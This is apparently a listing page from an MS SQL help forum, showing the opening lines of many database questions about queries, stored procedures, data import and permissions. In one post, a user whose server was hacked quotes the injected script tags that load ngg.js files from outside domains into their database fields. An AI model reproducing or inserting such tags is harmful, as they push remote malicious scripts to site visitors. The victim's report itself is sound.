2,736 Topics

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Member Avatar for Lokesh.snghl

hi all, I want to calculate days b/w two different month like as 7/15/2008 and 9/30/2008 this is silly question but i have problm to calculte ti .Its urgent in projec

Member Avatar for tesuji
Member Avatar for kavithabhaskar

there is another problem that i am facing..i got 2 comboboxes filled with values from MS Access and they have values like 1.00,2.00,2.98,3.00,3.25 and 8.00 I want to be able to choose 2 values i.e. one value from each combo box and when I hit click I should get queries …

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Member Avatar for ncognito66

Sorry, I posted this in the wrong area (I'm using MySQL) Hello all: I'm currently building a website for a radio station and I want to setup a programming lineup. The fields I'm using are: ID Title Dayofweek (Show Day) Timeslot (Show Time) AMPM (AM or PM) Description Name (Host …

Member Avatar for tesuji
Member Avatar for stockton

I have written the following Stored Procedure in an attempt to update two tables in the same database reliably but unfortunately it is not too successful. I ocassionaly end up with only the BundlesIssued tables updated and nothing in TicketsIssued. Please make suggestions on how I could make this stored …

Member Avatar for tesuji
Member Avatar for kyriakos70

Hello, I have a table with a field AFM (integer), I want to display all fields of the AFM column that have the same value eg. 1 row has 1111 2 row has 4567 3 row has 1111 4 row has 5678 5 row has 3456 6 row has 3456 …

Member Avatar for RipperJT
Member Avatar for ggk517

Hi, Why a database with two words separated by a space causes problem to a bcp command like below : EXEC xp_cmdshell 'bcp [History Data].dbo.InventoryValuation_FP102008" out D:\test.txt -q -T -c' Do you guys met with the same problem before? If yes, how to solve it. Many thanks.

Member Avatar for RDWilson2
Member Avatar for jainendra.shah

hello frds, I m working on windows app in .net envirement with c#. I want to fetch large amount of data from a table and load it to my app. by dataset. but problem is, it unable to handle this or take a long time. My table have approx 10 …

Member Avatar for wujtehacjusz
Member Avatar for matiman

Hello everybody, i'm a newbie to MSSQL - so excuse the newbie question. i am creating a page wich is hosted like any other page on a web server, i need to somehow connect to a MSSQL server , wich is located on a normal computer and connected to the …

Member Avatar for matiman
Member Avatar for surgupta

hi i'm a new user to ms sql 2005. Can anyone please tell me how can i make a existing null constraint column of a table as a not null ..... i.e If a column already exists and can hv null value ,then how can i convert it into not …

Member Avatar for RipperJT
Member Avatar for kjomyjose

Four times my MSSQL Server hacked. Somebody inserts most of the tables text, varchar fields with its value adding at the end with<script src=http://www.pyttco.com/ngg.js></script> I changed my ftp usernamd and password, database username and password. Still they are able to insert different scripts like <script src=http://www.cdport.eu/ngg.js></script> <script src=http://www.drvadw.com/ngg.js></script> <script src=http://www.bnrc.ru/ngg.js></script> …

Member Avatar for peter_budo
Member Avatar for chris-uk-lad

Hi all! Ive created this code to read in data from several tables but i have a problem with SUM. With this code im trying to add together all the null values that have the most recent date but all the SUM commandi have does is multiply the number by …

Member Avatar for tesuji
Member Avatar for bajanstar

Hi Guys, I have a text file which looks like this 123456 Amanda Morris and I would like it to look like this "123456","Amanda","Morris" The file has about 2000 lines how would I go about inserting the quotes and the commas. I use textpad to open the textfile and I …

Member Avatar for peter_budo
Member Avatar for stewpyd

Hi, I have an average cost greater than price crystal report for 20 different stores. I want to create a master report that lists all of the results over the entire company. Hence, I want to use union all in a SQL command for this master crystal report. For example, …

Member Avatar for tesuji
Member Avatar for WatsonPsykosis

So I got this code off the internet. The guy who made it said this, "I have done this in SQL Server.If u want to do in Acess Database just create a table name USERS then add two fields name user_name and user_pwd thats it." I tried that and it …

Member Avatar for cutepinkbunnies
Member Avatar for harcaype

hi. I'm trying to delete a row by specifying the actual row number. When I call all columns from one table it does work but when I already multiselect them I get an error: [COLOR="red"][I]Msg 4405, Level 16, State 1, Line 1 View or function 'Records ORDERED BY rowID' is …

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Member Avatar for bhavna_816

I want to select data from ranges like Column1 Column2 25000 10 50000 20 75000 30 I want records like upto 25000, I get 10 upto 50000, I get 20 upto or more than 75000, I get 30 Can anybody suggest me a simple query for that? Thanks in advance,

Member Avatar for jais0n
Member Avatar for zenocide

Why is this script not working.. [CODE] USE [KN_online] GO SET ANSI_NULLS OFF GO SET QUOTED_IDENTIFIER ON GO CREATE PROCEDURE [dbo].[UPDATE_PREMIUM_SERVICE_USER_EXEC] AS DECLARE @d24 datetime SET @d24 = DateAdd(hh,-24, GETDATE()) UPDATE PREMIUM_SERVICE SET nDays = nDays - 1 where Date > @d24 [/CODE] This is suppose to take 1 day …

Member Avatar for zenocide
Member Avatar for dmmckelv

Is there a keyword in SQL that would allow you to select a value from a field in the previous row? I am looking for something that would give me the speed field value for the row before: [code]SELECT min(Parsed.Time), [Parsed.Number] FROM Parsed GROUP BY [Parsed.Rev Number] [/code]

Member Avatar for tesuji
Member Avatar for sbv

hi i need to store data more than 8000 char in varchar in sql server 2000 how can i? plz help.

Member Avatar for peter_budo
Member Avatar for dmmckelv

Hopefully this will be an easy one for someone. I am trying to write a SELECT statement that pulls the row with the least time for each Special Number. Example data would be: Time Special Number 3:25:00 1 3:26:00 1 3:25:30 2 3:26:30 2 The expected output would be: 3:25:00 …

Member Avatar for wujtehacjusz
Member Avatar for byte00

I have 2 table in a ms sql database prod_curs_test and rebuturi_test. I want to update some fields in prod_curs_test with data from rebuturi_test. I used this to do that: [code] update dbo.prod_curs_test set dbo.prod_curs_test.cant_rebuturi = (SELECT dbo.rebuturi_test.Cantitate FROM dbo.rebuturi_test CROSS JOIN dbo.prod_curs_test WHERE dbo.rebuturi_test.Comanda = dbo.prod_curs_test.Comanda) where exists (SELECT …

Member Avatar for peter_budo
Member Avatar for campkev

This isn't a problem as I have already solved the problem, just trying to figure out why it happened. Ok I have a field that is type money. I wrote a stored procedure that updates this field, however, I made the datatype for the parameter to get passed in a …

Member Avatar for RipperJT
Member Avatar for sushantlikhar

Hi , I have designed a database that is to create a application simlar to microsoft money The database erd is aattched with this post. The database has following table Invoice Amount Account Profit_center Customer A invoice can sometimes split in to 3 parts therefore i have create table invoice …

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Member Avatar for oracio

Hello, I recently bought a new server and I'm trying to move the MSSQL database from the old mssql (MSSQL 2000) to the new system MSSQL Express 2005. I made a .bak file in the old server and restored it succesfuly in the new server. the thing is that it …

Member Avatar for zenocide
Member Avatar for harcaype

[B]Is it possible in a query to delete a row specifying its row index?[/B] I want to delete a row from my table. I'm trying to figure this because when I delete rows from my datagridview, it does not update. So I was thinking if I just directly delete it …

Member Avatar for wujtehacjusz
Member Avatar for bartbauldry

Hello I seem to be having a problem, I have this query that pulls back correct results [CODE]SELECT hourStamp, SUM(CASE WHEN datestamp < GETDATE() THEN 1 ELSE 0 END) / @numberofdays as HourAverage, SUM(CASE WHEN dateStamp BETWEEN DATEADD(d,DATEDIFF(d,0,GETDATE()),0) AND GETDATE() THEN 1 ELSE 0 END) as HourToday FROM webstats GROUP …

Member Avatar for bartbauldry
Member Avatar for guptaalok12
Member Avatar for guptaalok12
Member Avatar for y_itay

Hey guys, I have some question about a query in SQL I'm buliding for my software. This software meant for Bills managing. I have main screen which display all the bills and another screen which display the bill details, this screen built on 3 tables : Bill,BillItem,Payment tables. My question …

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Member Avatar for leonaral

I'm getting the error Incorrect syntax near '=' when running the following query. I'm fairly new to SQL, but this looks like it's pretty straightforward. Basically, I have a table with smartphone information (A_INV_SMARTPHONE) and a table for Windows CE Pocket PC information (A_INV_WINDOWS_CE). Both tables contain columns for Manufacturer …

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The End.